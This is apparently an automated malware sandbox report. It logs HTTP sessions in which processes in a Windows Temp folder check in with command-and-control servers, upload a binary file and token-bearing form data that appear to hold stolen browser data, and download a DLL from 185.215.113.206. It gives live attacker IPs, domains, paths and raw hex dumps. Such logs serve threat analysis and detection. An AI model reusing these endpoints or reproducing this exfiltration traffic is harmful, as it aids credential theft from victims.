                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:22.413410902 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:22 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              67192.168.2.450144185.121.15.192802648C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:22.757028103 CET12360OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                              Host: fivetk5sb.top
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              Content-Length: 27550
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=------------------------LD6ZS6L8rUHFQ5ehyM7ZrT
                                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4c 44 36 5a 53 36 4c 38 72 55 48 46 51 35 65 68 79 4d 37 5a 72 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 47 6f 6a 69 63 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0f db fc 92 00 a4 b4 b4 17 2d 84 27 24 e9 64 cc c5 55 b2 88 bd 02 13 a9 01 7e 49 8e a5 e7 65 2b 5d ac 6f 05 0d 41 f6 2a c6 9e 47 6c da ec 9b 40 83 ac 49 6f 82 1c 97 7e 92 b7 7c 37 d6 57 19 84 60 22 33 9d 97 87 a5 9f 18 e7 28 6e f6 ca 74 54 80 12 63 80 92 21 40 f2 0f 52 20 3f a0 bb 63 ec 28 a0 b2 6e 89 d5 55 eb b5 ba 8c 91 a2 c6 66 d0 29 4e bf 40 5d 22 19 66 c0 17 87 8a 62 de 7b 3f a6 e5 74 82 c0 c9 49 84 b6 ba 20 85 dc cd ea 54 c6 98 e0 fc 39 1c 16 d2 ea 15 e1 3e 1f 16 a0 ed a6 1c 3b 14 be ff 09 05 75 76 5f 21 2c 5e ca 63 35 1e [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: --------------------------LD6ZS6L8rUHFQ5ehyM7ZrTContent-Disposition: form-data; name="file"; filename="Gojicu.bin"Content-Type: application/octet-stream-'$dU~Ie+]oA*Gl@Io~|7W`"3(ntTc!@R ?c(nUf)N@]"fb{?tI T9>;uv_!,^c5P8&C`AY,&M-YK%Iwm@3nRlXl,2MNr!I>JoN.1?%!"|+I7`?W{-oVHQYeg}*D*@LaMG#,r{ju+S~PQQKi@\ufJ(n0c%z6e\nH>KC7G3@bw)9/F-kgk`}E=ianBmw6"EqcaR=+$I&rfx: llVpQ7-s}-lyBP@!N8iAk?,x}qeS#7=RO<_3kyi*\}myY9+\WWg9bxZdc&m1;@!#&QlU12@Zr\&Au(_hRIJM41o5:}y|Br#}Qe^ug~5Z'mF++ [TRUNCATED]
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:22.877163887 CET7416OUTData Raw: 54 9b 64 0b f6 33 4d 31 a9 e7 59 2a a6 69 16 9e df 3e a3 f7 53 d2 1c e5 6a f3 05 be 68 f4 74 13 97 68 0f 62 cc 36 05 32 f6 dc b8 ff 61 98 33 1a a7 3b 5b f4 41 0b 9a 84 0c 95 20 b4 8e b3 6a 97 26 33 6f e1 b6 a5 46 68 ec 32 9b 14 89 e2 f6 a9 e0 7a
                                                                                                                                                                                                                                                              Data Ascii: Td3M1Y*i>Sjhthb62a3;[A j&3oFh2zI^j9I9wj+0lCR.*Z/NU zhT!U@\Sq^dz*H'HjQKb,[o[3<&d<W5-Lj
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:22.877392054 CET4944OUTData Raw: 1c 98 7a c3 dd 5d 15 00 b5 a8 7d 61 8c e7 d9 9e 20 ad 6d 5e 7b 78 03 cb 5f 1e 93 c9 4d 02 ae be b5 58 d2 6e 58 bd e7 48 26 e1 50 94 c0 74 ea 4b 49 40 dc 75 06 35 58 f6 9f f7 c3 f2 bf fb 88 81 b5 0c 73 c9 79 2e f6 23 5f 9d 67 68 5f 41 76 92 3d 5d
                                                                                                                                                                                                                                                              Data Ascii: z]}a m^{x_MXnXH&PtKI@u5Xsy.#_gh_Av=]v"H-2WHJM:/c/#KJEj&T{04${g6=8Z}V!8dz&3n|F9=k1Yu'8M+)*|
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:22.877427101 CET3011OUTData Raw: ac 1a ca ef 22 63 92 05 3b 6a e0 4a 80 63 30 14 f6 55 36 e8 62 29 8c ce 81 90 05 be a1 a4 b1 25 31 5a aa cb f1 f4 60 4d e4 bd 85 11 8a 32 5d 85 00 d9 28 c1 02 b6 1e 29 98 ed 12 64 ca bb a5 f0 bc 6e 2c 94 3d 11 4e 14 30 71 d8 04 bb 26 8e 10 b1 37
                                                                                                                                                                                                                                                              Data Ascii: "c;jJc0U6b)%1Z`M2]()dn,=N0q&7EuO>AgR/((e?D,TkOD7j{C\c{M4$n5byFy--.U/Td~^YMEsi;#g3)0v*T/P
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:24.407486916 CET274INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:24 GMT
                                                                                                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                              Content-Length: 2
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-RateLimit-Limit: 30
                                                                                                                                                                                                                                                              X-RateLimit-Remaining: 27
                                                                                                                                                                                                                                                              X-RateLimit-Reset: 1734832059
                                                                                                                                                                                                                                                              ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                              Data Raw: 4f 4b
                                                                                                                                                                                                                                                              Data Ascii: OK


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              68192.168.2.450152185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:23.851718903 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:25.171016932 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:24 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              69192.168.2.450153212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:24.119618893 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:25.476321936 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:25 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              70192.168.2.450159185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:26.932267904 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:28.271327972 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:28 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              71192.168.2.450160212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:27.771614075 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:28.722986937 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:28 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              72192.168.2.450163185.215.113.206807748C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:30.699223995 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFH
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Content-Length: 1451
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:30.699306965 CET1451OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63
                                                                                                                                                                                                                                                              Data Ascii: ------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:32.491250992 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:31 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:32.638647079 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----JJDBAEHIJKJKEBFIEGHI
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Content-Length: 363
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: ------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="file"------JJDBAEHIJKJKEBFIEGHI--
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:33.576499939 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:32 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:34.719768047 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----AAEHDAAKEHJECBFHCBKF
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Content-Length: 363
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: ------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="file"------AAEHDAAKEHJECBFHCBKF--
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:35.658689022 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:34 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:36.673425913 CET94OUTGET /68b591d6548ec281/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:37.110907078 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:36 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                              ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Content-Length: 685392
                                                                                                                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:37.110981941 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b
                                                                                                                                                                                                                                                              Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:37.111020088 CET248INData Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff
                                                                                                                                                                                                                                                              Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh|$,}uT$4D$0P|OL$8PVS'D$@?@L$L$D$D$D$$
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:37.111052036 CET1236INData Raw: 00 00 31 d2 31 c9 89 5c 24 28 eb 24 89 c7 8b 44 24 1c 83 c0 01 83 f8 06 8b 54 24 18 8b 4c 24 14 0f 84 e2 01 00 00 89 44 24 1c 8a 44 24 07 04 ff 8b 74 24 38 0f 1f 84 00 00 00 00 00 89 c3 88 44 24 07 8b 44 24 40 89 cf 89 4c 24 14 0f b6 c9 c1 e1 18
                                                                                                                                                                                                                                                              Data Ascii: 11\$($D$T$L$D$D$t$8D$D$@L$T$|$ L$$\$\$T$1%1%1T$D|$@|$t\$(D$\$(sFD$,D$
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:37.111087084 CET224INData Raw: 45 dc 89 ca f7 da c1 fa 1f f7 d2 8b 45 1c 80 7c 30 f7 01 19 db 09 d3 b8 01 00 00 00 29 c8 c1 f8 1f 8b 55 1c 80 7c 32 f6 01 19 d2 f7 d0 09 c2 21 da 21 fa b8 02 00 00 00 29 c8 c1 f8 1f f7 d0 8b 5d 1c 80 7c 33 f5 01 19 ff 09 c7 b8 03 00 00 00 29 c8
                                                                                                                                                                                                                                                              Data Ascii: EE|0)U|2!!)]|3)|3!)}|7!!)U|2)|2!!)M|1t/EU;U]w"
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:37.111123085 CET1236INData Raw: 31 ff 8b 45 0c 39 c6 74 3a 52 56 50 e8 20 01 08 00 eb 2d bf ff ff ff ff eb 3a b9 02 e0 ff ff 8b 5d d4 51 e8 73 00 08 00 83 c4 04 bf ff ff ff ff 8b 45 0c 39 c6 75 0c 53 6a 00 50 e8 af 00 08 00 83 c4 0c 8b 45 d8 85 c0 74 0a 53 50 e8 5c 00 08 00 83
                                                                                                                                                                                                                                                              Data Ascii: 1E9t:RVP -:]QsE9uSjPEtSP\M1$^_[]USWVut:}t$FHjShjVPt^_[]^_[]USWV}tVEGGHtIUuu
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:37.111159086 CET1236INData Raw: 83 c4 10 eb 6e 8d 46 08 89 45 ec 8b 46 08 89 45 f0 c7 46 08 00 00 00 00 89 5e 04 8b 4b 04 ff 15 00 80 0a 10 ff d1 89 06 bb ff ff ff ff 85 c0 74 3d 89 f1 8b 55 10 ff 75 18 ff 75 14 e8 23 fc ff ff 83 c4 08 85 c0 74 1c 8b 3e 85 ff 74 20 8b 46 04 8b
                                                                                                                                                                                                                                                              Data Ascii: nFEFEF^Kt=Uuu#t>t FHjWEM1^_[]USWVu>FHW>FHXSVW^_[]USWVu}E@HWVS^_[]
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:37.119105101 CET1236INData Raw: ff ff 8a 04 0e 88 06 c6 04 0e 00 b8 02 00 00 00 0f b6 54 06 ff 0f b6 f9 01 d7 0f b6 8c 05 ef fe ff ff 01 f9 0f b6 f9 0f b6 1c 3e 88 5c 06 ff 88 14 3e 3d 00 01 00 00 74 25 0f b6 14 06 0f b6 f9 01 d7 0f b6 8c 05 f0 fe ff ff 01 f9 0f b6 f9 0f b6 1c
                                                                                                                                                                                                                                                              Data Ascii: T>\>=t%>>fM1^_[]U}thuo]UVuE9sh;UMVuPu^]USWV4MEE9
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:37.119159937 CET1236INData Raw: 0f f4 f7 66 0f 70 ef f5 66 0f f4 ec 66 0f 6f e0 66 0f fe 25 d0 20 08 10 66 0f 70 fe e8 66 0f 70 ed e8 66 0f 62 fd 66 0f 6e 6c 07 04 66 0f ef db 66 0f 60 eb 66 0f 61 eb 66 0f ef db 66 0f eb f9 66 0f 72 f4 17 66 0f fe 25 e0 20 08 10 f3 0f 5b cc 66
                                                                                                                                                                                                                                                              Data Ascii: fpffof% fpfpfbfnlff`fafffrf% [fpffpfpffpfbffof fnf`fafrfo- f[fpffpffof%!fpfpfbfnTf`faffrf[f
